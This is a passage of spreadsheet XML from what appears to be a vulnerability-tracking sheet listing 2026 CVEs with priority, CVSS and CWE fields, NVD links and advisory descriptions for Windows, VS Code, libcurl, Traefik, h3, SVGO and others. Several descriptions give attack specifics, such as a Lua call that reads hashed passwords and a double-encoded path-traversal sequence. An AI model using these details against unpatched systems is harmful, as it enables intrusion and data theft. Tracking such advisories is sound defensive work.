          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1784" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t>
        </is>
      </c>
    </row>
    <row r="1785">
      <c r="A1785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81356</t>
        </is>
      </c>
      <c r="C1785" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1785" s="5" t="inlineStr"/>
      <c r="F1785" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1785" s="5" t="inlineStr"/>
      <c r="H1785" s="5" t="inlineStr"/>
      <c r="I1785" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1785" s="5" t="inlineStr"/>
      <c r="K1785" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L1785" s="5" t="inlineStr">
        <is>
          <t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M1785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t>
        </is>
      </c>
    </row>
    <row r="1786">
      <c r="A1786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81357</t>
        </is>
      </c>
      <c r="C1786" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1786" s="5" t="inlineStr"/>
      <c r="F1786" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1786" s="5" t="inlineStr"/>
      <c r="H1786" s="5" t="inlineStr"/>
      <c r="I1786" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1786" s="5" t="inlineStr"/>
      <c r="K1786" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1786" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M1786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t>
        </is>
      </c>
    </row>
    <row r="1787">
      <c r="A1787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81378</t>
        </is>
      </c>
      <c r="C1787" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1787" s="5" t="inlineStr"/>
      <c r="F1787" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1787" s="5" t="inlineStr"/>
      <c r="H1787" s="5" t="inlineStr"/>
      <c r="I1787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1787" s="5" t="inlineStr"/>
      <c r="K1787" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L1787" s="5" t="inlineStr">
        <is>
          <t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M1787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t>
        </is>
      </c>
    </row>
    <row r="1788">
      <c r="A1788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81379</t>
        </is>
      </c>
      <c r="C1788" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1788" s="5" t="inlineStr"/>
      <c r="F1788" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1788" s="5" t="inlineStr"/>
      <c r="H1788" s="5" t="inlineStr"/>
      <c r="I1788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1788" s="5" t="inlineStr"/>
      <c r="K1788" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="L1788" s="5" t="inlineStr">
        <is>
          <t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M1788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t>
        </is>
      </c>
    </row>
    <row r="1789">
      <c r="A1789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82209</t>
        </is>
      </c>
      <c r="C1789" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1789" s="5" t="inlineStr"/>
      <c r="F1789" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1789" s="5" t="inlineStr"/>
      <c r="H1789" s="5" t="inlineStr"/>
      <c r="I1789" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1789" s="5" t="inlineStr"/>
      <c r="K1789" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L1789" s="5" t="inlineStr">
        <is>
          <t>When libpsl support is enabled, libcurl fails to enforce the Public Suffix
List boundary check when processing a `Set-Cookie` header where the `Domain`
attribute explicitly matches an origin host that is itself a public suffix
(e.g., `Domain=co.uk` set by `co.uk`).
Instead of coercing it into a strict host-only cookie, libcurl saves the
cookie with wildcard domain scope (`.co.uk`). Consequently, the cookie is
inappropriately included in subsequent outbound requests or HTTP redirects to
arbitrary sibling subdomains under the same public suffix (e.g.,
`attacker.co.uk`).</t>
        </is>
      </c>
      <c r="M1789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82209</t>
        </is>
      </c>
    </row>
    <row r="1790">
      <c r="A1790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82262</t>
        </is>
      </c>
      <c r="C1790" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1790" s="5" t="inlineStr"/>
      <c r="F1790" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1790" s="5" t="inlineStr"/>
      <c r="H1790" s="5" t="inlineStr"/>
      <c r="I1790" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1790" s="5" t="inlineStr"/>
      <c r="K1790" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1790" s="5" t="inlineStr">
        <is>
          <t>Logto through 1.42.0 contains a server-side request forgery vulnerability in the POST /api/hooks/:id/test endpoint that accepts arbitrary URLs without host validation. Tenant administrators with Management API tokens can make the server issue HTTP POST requests to internal URLs and retrieve response bodies from services on the private network.</t>
        </is>
      </c>
      <c r="M1790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82262</t>
        </is>
      </c>
    </row>
    <row r="1791">
      <c r="A1791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82263</t>
        </is>
      </c>
      <c r="C1791" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1791" s="5" t="inlineStr"/>
      <c r="F1791" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1791" s="5" t="inlineStr"/>
      <c r="H1791" s="5" t="inlineStr"/>
      <c r="I1791" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1791" s="5" t="inlineStr"/>
      <c r="K1791" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1791" s="5" t="inlineStr">
        <is>
          <t>Logto through 1.42.0 contains a server-side request forgery vulnerability in the OIDC SSO connector creation endpoint that fails to validate the issuer URL parameter. Tenant administrators with Management API credentials can supply arbitrary internal URLs to trigger HTTP GET requests to private network services, with response content returned in API responses.</t>
        </is>
      </c>
      <c r="M1791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82263</t>
        </is>
      </c>
    </row>
    <row r="1792">
      <c r="A1792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82586</t>
        </is>
      </c>
      <c r="C1792" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1792" s="5" t="inlineStr"/>
      <c r="F1792" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1792" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1792" s="5" t="inlineStr"/>
      <c r="I1792" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1792" s="5" t="inlineStr"/>
      <c r="K1792" s="5" t="inlineStr">
        <is>
          <t>CWE-424</t>
        </is>
      </c>
      <c r="L1792" s="5" t="inlineStr">
        <is>
          <t>Improper Protection of Alternate Path vulnerability in ash-project ash_lua allows a user-supplied Lua script to read attributes that are not on the exposed-field allow-list.
AshLua exposes Ash resources to Lua scripts, gated by a manifest declaring which fields are exposed. The read action's operation aggregate path in AshLua.Runtime took the field name straight from the Lua call and resolved it with only String.to_existing_atom and Ash.Query.Aggregate.new!, neither of which consults the exposed-field allow-list the normal fields path enforces. A script can therefore read the value of any attribute of any record the actor may read, including private sensitive?: true columns, via resource.read({ operation = {"list", "hashed_password"} }); min and max give a value oracle. Anyone able to submit or influence a Lua script can reach this.
This issue affects ash_lua: from 0.1.0 before 0.2.1.</t>
        </is>
      </c>
      <c r="M1792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82586</t>
        </is>
      </c>
    </row>
    <row r="1793">
      <c r="A1793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82728</t>
        </is>
      </c>
      <c r="C1793" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1793" s="5" t="inlineStr"/>
      <c r="F1793" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1793" s="5" t="inlineStr"/>
      <c r="H1793" s="5" t="inlineStr"/>
      <c r="I1793" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1793" s="5" t="inlineStr"/>
      <c r="K1793" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1793" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint mint allows a remote HTTP server to exhaust memory on the client host and cause a denial of service.
Two HTTP/1 response-parser states accumulate server data without any cap. In lib/mint/http1.ex, decode_status_line/4 stores the unconsumed data in conn.buffer when the status line is incomplete, and decode_body/5 does the same for an unterminated chunk-extension line. Both wait for a CRLF the server never has to send, and conn.buffer is prepended to every subsequent socket message. The :max_header_list_size budget is wired only into decode_headers/5 and decode_trailer_headers/4, so neither of these states is covered by it. A malicious server, or one reached through an attacker-controlled redirect or a fetched URL, streams bytes indefinitely until the BEAM node is killed by the operating system out-of-memory handler. The chunk-extension variant is reached after a valid status line and a complete, valid header section, so an intermediary inspecting only headers sees an ordinary 200 response.
This issue affects mint: from 0.1.0 before 1.10.0.</t>
        </is>
      </c>
      <c r="M1793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82728</t>
        </is>
      </c>
    </row>
    <row r="1794">
      <c r="A1794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82753</t>
        </is>
      </c>
      <c r="C1794" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1794" s="5" t="inlineStr"/>
      <c r="F1794" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1794" s="5" t="inlineStr"/>
      <c r="H1794" s="5" t="inlineStr"/>
      <c r="I1794" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1794" s="5" t="inlineStr"/>
      <c r="K1794" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1794" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in ash-project ash_authentication_oauth2_server allows an unauthenticated attacker to exhaust database storage and memory.
The /authorize endpoint is unauthenticated by design. With Client ID Metadata Documents enabled, resolve_client/3 in AshAuthentication.Oauth2Server.CIMD fetches the document for each new URL-shaped client_id and upserts a client row, with no cap on the number of rows, no expiry or garbage collection, and no length bound on the fetched fields; the document was also placed in CIMD.Cache before validation, so even rejected documents held cache memory until their TTL. An attacker serving valid documents at many distinct URLs creates one permanent client row per URL, each able to carry multi-megabyte strings, growing storage and memory without bound.
This issue affects ash_authentication_oauth2_server: from 0.3.0 before 0.3.1.</t>
        </is>
      </c>
      <c r="M1794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82753</t>
        </is>
      </c>
    </row>
    <row r="1795">
      <c r="A1795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82869</t>
        </is>
      </c>
      <c r="C1795" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1795" s="5" t="inlineStr"/>
      <c r="F1795" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1795" s="5" t="inlineStr"/>
      <c r="H1795" s="5" t="inlineStr"/>
      <c r="I1795" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1795" s="5" t="inlineStr"/>
      <c r="K1795" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1795" s="5" t="inlineStr">
        <is>
          <t>ToolJet Database versions before v3.16.44 contain a privilege escalation vulnerability in the join_tables endpoint that grants JOIN_TABLES ability to all authenticated users without role or workspace membership validation. Attackers can read arbitrary ToolJet Database tables from any workspace by supplying victim workspace identifiers in the request path while authenticating with their own workspace credentials.</t>
        </is>
      </c>
      <c r="M1795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82869</t>
        </is>
      </c>
    </row>
    <row r="1796">
      <c r="A1796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82871</t>
        </is>
      </c>
      <c r="C1796" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1796" s="5" t="inlineStr"/>
      <c r="F1796" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1796" s="5" t="inlineStr"/>
      <c r="H1796" s="5" t="inlineStr"/>
      <c r="I1796" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1796" s="5" t="inlineStr"/>
      <c r="K1796" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1796" s="5" t="inlineStr">
        <is>
          <t>ToolJet before v3.16.208 fails to validate organization membership in database read routes, allowing any authenticated user to access other organizations' table schemas and row data. Attackers can supply arbitrary organization IDs in URL parameters to list tables, retrieve column definitions, and execute join queries to read actual stored data from victim organizations.</t>
        </is>
      </c>
      <c r="M1796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82871</t>
        </is>
      </c>
    </row>
    <row r="1797">
      <c r="A1797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83939</t>
        </is>
      </c>
      <c r="C1797" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1797" s="5" t="inlineStr"/>
      <c r="F1797" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1797" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1797" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I1797" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1797" s="5" t="inlineStr"/>
      <c r="K1797" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1797" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83939</t>
        </is>
      </c>
    </row>
    <row r="1798">
      <c r="A1798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84370</t>
        </is>
      </c>
      <c r="C1798" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1798" s="5" t="inlineStr"/>
      <c r="F1798" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1798" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1798" s="5" t="inlineStr"/>
      <c r="I1798" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1798" s="5" t="inlineStr"/>
      <c r="K1798" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-79</t>
        </is>
      </c>
      <c r="L1798" s="5" t="inlineStr">
        <is>
          <t>SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 1.0.0 until versions 2.8.4, 3.3.5, and 4.1.0, the opt-in removeScripts plugin, named removeScriptElement in versions 2 and 3, incompletely filters executable links in plugins/removeScripts.js and lib/svgo/tools.js. The plugin does not recognize namespace-prefixed SVG anchor elements such as svg:a with href or namespaced *:href values, and it does not remove ASCII tab, line-feed, or carriage-return characters before checking URL schemes. Browsers remove those characters before parsing a scheme, allowing an executable link to pass the plugin's check. When an application processes attacker-controlled SVG input and serves the result in an active browser context, a victim who activates the surviving link can execute script in the SVG's origin, expose data, modify content, or perform actions as the victim. This issue is fixed in versions 2.8.4, 3.3.5, and 4.1.0.</t>
        </is>
      </c>
      <c r="M1798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t>
        </is>
      </c>
    </row>
    <row r="1799">
      <c r="A1799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85596</t>
        </is>
      </c>
      <c r="C1799" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1799" s="5" t="inlineStr"/>
      <c r="F1799" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1799" s="5" t="inlineStr">
        <is>
          <t>nginx, kubernetes</t>
        </is>
      </c>
      <c r="H1799" s="5" t="inlineStr"/>
      <c r="I1799" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1799" s="5" t="inlineStr"/>
      <c r="K1799" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1799" s="5" t="inlineStr">
        <is>
          <t>Traefik versions &gt;= v3.7.0 and &lt;= v3.7.10 contain an authentication bypass in the Kubernetes Ingress NGINX provider. The TLS option generated for an Ingress carrying the nginx.ingress.kubernetes.io/auth-tls-secret annotation was named after the Ingress namespace and name. As a result, two Ingress objects sharing the same host, the same client CA secret, and the same client-authentication mode produced two distinct TLS option names for that host. Traefik treats this as a TLS options conflict and falls back to the entry point's default TLS configuration, which does not request a client certificate, so a route configured with nginx.ingress.kubernetes.io/auth-tls-verify-client: "on" becomes reachable without a client certificate. Only the v3.7 line is affected; the issue is fixed in v3.7.11.</t>
        </is>
      </c>
      <c r="M1799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85596</t>
        </is>
      </c>
    </row>
    <row r="1800">
      <c r="A1800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85597</t>
        </is>
      </c>
      <c r="C1800" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1800" s="5" t="inlineStr"/>
      <c r="F1800" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1800" s="5" t="inlineStr"/>
      <c r="H1800" s="5" t="inlineStr"/>
      <c r="I1800" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1800" s="5" t="inlineStr"/>
      <c r="K1800" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1800" s="5" t="inlineStr">
        <is>
          <t>Traefik before v2.11.55 and v3.0.0 through v3.7.10 contain a TLS option conflict resolution vulnerability that allows unauthenticated attackers to bypass client-certificate authentication by creating conflicting TLS options on multi-host routers. Attackers can reach protected backends by exploiting shared TLS resolution across multiple hostnames in a single router rule, causing the strict mTLS requirement to fall back to default options for all hosts.</t>
        </is>
      </c>
      <c r="M1800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85597</t>
        </is>
      </c>
    </row>
    <row r="1801">
      <c r="A1801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85730</t>
        </is>
      </c>
      <c r="C1801" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1801" s="5" t="inlineStr"/>
      <c r="F1801" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1801" s="5" t="inlineStr"/>
      <c r="H1801" s="5" t="inlineStr"/>
      <c r="I1801" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1801" s="5" t="inlineStr"/>
      <c r="K1801" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-835</t>
        </is>
      </c>
      <c r="L1801" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">smol-toml </t>
        </is>
      </c>
      <c r="M1801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85730</t>
        </is>
      </c>
    </row>
    <row r="1802">
      <c r="A1802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86145</t>
        </is>
      </c>
      <c r="C1802" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1802" s="5" t="inlineStr"/>
      <c r="F1802" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1802" s="5" t="inlineStr"/>
      <c r="H1802" s="5" t="inlineStr"/>
      <c r="I1802" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1802" s="5" t="inlineStr"/>
      <c r="K1802" s="5" t="inlineStr">
        <is>
          <t>CWE-424</t>
        </is>
      </c>
      <c r="L1802" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48 allows a pcre2_dfa_match out-of-bounds write because reuse of a cached workspace block, in a recursive DFA matching workspace, lacks a size check (even though a newly allocated block, for the same purpose, does have a size check). This outcome requires an attacker-controlled regular expression, or a recursive pattern in conjunction with a small heap limit (this can be set through the API).</t>
        </is>
      </c>
      <c r="M1802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86145</t>
        </is>
      </c>
    </row>
    <row r="1803">
      <c r="A1803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86251</t>
        </is>
      </c>
      <c r="C1803" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1803" s="5" t="inlineStr"/>
      <c r="F1803" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1803" s="5" t="inlineStr"/>
      <c r="H1803" s="5" t="inlineStr"/>
      <c r="I1803" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1803" s="5" t="inlineStr"/>
      <c r="K1803" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1803" s="5" t="inlineStr">
        <is>
          <t>h3 versions before 1.15.9 contain a path traversal vulnerability in the serveStatic utility. A double-decoding flaw allows a request path containing double-encoded dot sequences (e.g. %252e%252e) to be decoded to %2e%2e, which survives resolveDotSegments() because that function only checks for literal '.' characters. When the resulting asset ID is resolved by URL-based backends (CDN, S3, object storage), %2e%2e is interpreted as '..' per RFC 3986, enabling path traversal to read arbitrary files from the backend.</t>
        </is>
      </c>
      <c r="M1803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86251</t>
        </is>
      </c>
    </row>
    <row r="1804">
      <c r="A1804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86253</t>
        </is>
      </c>
      <c r="C1804" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1804" s="5" t="inlineStr"/>
      <c r="F1804" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1804" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1804" s="5" t="inlineStr"/>
      <c r="I1804" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1804" s="5" t="inlineStr"/>
      <c r="K1804" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1804" s="5" t="inlineStr">
        <is>
          <t>h3 (npm package) versions &lt;= 2.0.1-rc.14 contain a path traversal vulnerability in serveStatic(). On Node.js deployments, event.url.pathname is not normalized, so percent-encoded dot segments (%2e%2e) are passed to decodeURI() and decoded to ../ sequences without sanitization. An unauthenticated remote attacker can send crafted requests to endpoints served by serveStatic() to read arbitrary files outside the intended static directory. Fixed in 1.15.6 and 2.0.1-rc.15.</t>
        </is>
      </c>
      <c r="M1804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86253</t>
        </is>
      </c>
    </row>
    <row r="1805">
      <c r="A1805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86258</t>
        </is>
      </c>
      <c r="C1805" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1805" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1805" s="5" t="inlineStr"/>
      <c r="F1805" s="5" t="n">
        <v>0.004</v>
